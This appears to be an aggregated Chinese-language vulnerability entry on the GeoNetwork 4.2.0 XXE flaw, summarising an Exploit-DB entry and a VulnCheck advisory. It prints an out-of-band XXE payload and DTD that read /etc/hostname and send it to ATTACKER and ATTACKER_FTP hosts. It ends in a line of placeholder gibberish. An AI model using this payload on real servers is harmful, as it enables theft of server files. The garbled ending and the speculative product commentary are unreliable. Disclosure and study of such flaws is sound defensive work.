# Geonetwork 4.2.0 XXE漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Geonetwork 4.2.0 - XML External Entity (XXE) - Multiple webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:
## 关键信息
- **漏洞标题**: Geonetwork 4.2.0 - XML External Entity (XXE)
- **EDB-ID**: 50982
- **CVE**: N/A
- **作者**: Amel BOUZIANE-LEBLOND
- **类型**: WEBAPPS
- **平台**: MULTIPLE
- **日期**: 2022-07-29
### 漏洞描述
- **受影响版本**: GeoNetwork 3.10.x to 4.2.0
- **测试环境**: Microsoft Windows Server & Linux
- **问题描述**: 在渲染地图的PDF时,从不受信任的来源接收的XML文档解析器未正确配置,可能导致任意文件从服务器中检索。
### 漏洞利用
- **XXE Attack XML 示例**:
```xml
<!DOCTYPE foo [<!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1;]>
<foo>&external;</foo>
```
- **DTA文件示例**:
```xml
<!ENTITY % stuff SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'">>
```
- **说明**: 利用上述方法,攻击者可以构建恶意的XML文件,诱导服务器解析该文件并泄露系统中的文件内容。
标题: Home — GeoNetwork opensource -- 🔗来源链接
标签:product
神龙速读:
从提供的网页截图中,可以获取到以下关于漏洞的关键信息:
- **GeoNetwork是一个用于分享和查找信息的目录应用程序**,通过完整的元数据编辑和审查工具支持信息的发布工作流。这表明,如果这些工具存在安全漏洞,可能会导致信息泄露或未经授权的修改。
- **用户可以通过关键词、资源类型、组织、规模等进行全文和多面搜索**,并且可以通过这些搜索快速定位感兴趣的记录。这表明,如果搜索功能存在漏洞,可能会被用于信息窥探或SQL注入攻击。
- **GeoNetwork提供了一种易于使用Web界面来搜索多个目录中的地理空间数据**。这表明,如果Web界面存在漏洞,可能会被用于针对多个目录的攻击。
- **GeoNetwork提供了一个通用的目录,用于分享信息,可以轻松浏览记录、查找来源或服务、发布数据集**。如果这个目录功能存在漏洞,可能会导致数据集的泄露或篡改。
- **GeoNetwork提供了一个可以访问开放OGC服务(WMS, WMTS)和REST服务(特征服务,MapService)的交互式地图查看器OpenLayers**,还支持标准格式(KML, OWS)。如果这个交互式地图查看器或服务存在漏洞,可能会导致地理数据的泄露或恶意使用。
- GeoNetwork支持多种元数据格式和标准(Dublin Core, ISO-19115, ISO-19119, ISO-19110),并且提供在线元数据编辑工具。如果这些工具或标准实现存在漏洞,可能会导致元数据的篡改或信息泄露。
- GeoNetwork提供了一个可以轻松发布信息的编辑器仪表板和一个完整的发布工作流,以便在发布前审查和批准更改。如果这个发布工作流存在漏洞,可能会导致未经授权的信息发布或篡改。
- GeoNetwork提供了一个易于定制和扩展的界面,包括颜色和标志调整、Bootstrap主题以及插件机制。如果这个定制和扩展功能存在漏洞,可能会导致安装和使用恶意插件的风险。
- GeoNetwork提供了一个REST API,可与GeoNetwork客户端和外部系统一起使用。如果这个API存在漏洞,可能会被用于未经授权的访问或数据操作。
标题: Geonetwork 4.2.0 - XML External Entity (XXE) | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
### 关键漏洞信息
**漏洞名称:**
Geonetwork 4.2.0 - XML External Entity (XXE)
**严重性:**
HIGH
**日期:**
January 13, 2026
**影响:**
- GeoNetwork <= 4.2.0
**CVE ID:**
CVE-2022-50899
**CWE ID:**
CWE-611 Improper Restriction of XML External Entity Reference
**CVSS 分数:**
5.4 (CVSS:3.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
**相关链接:**
- ExploitDB ID: 50982
- Geonetwork Official Homepage
**信用:**
Amel BOUZIANE-LEBLOND
**描述:**
Geonetwork 3.10 至 4.2.0 包含一个在PDF渲染中的XML外部实体漏洞,允许攻击者从服务器检索任意文件。攻击者可以通过利用不安全的XML解析器,创建带有外部实体引用的恶意XML文档,通过PDF创建请求中的baseURL参数来读取系统文件。
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.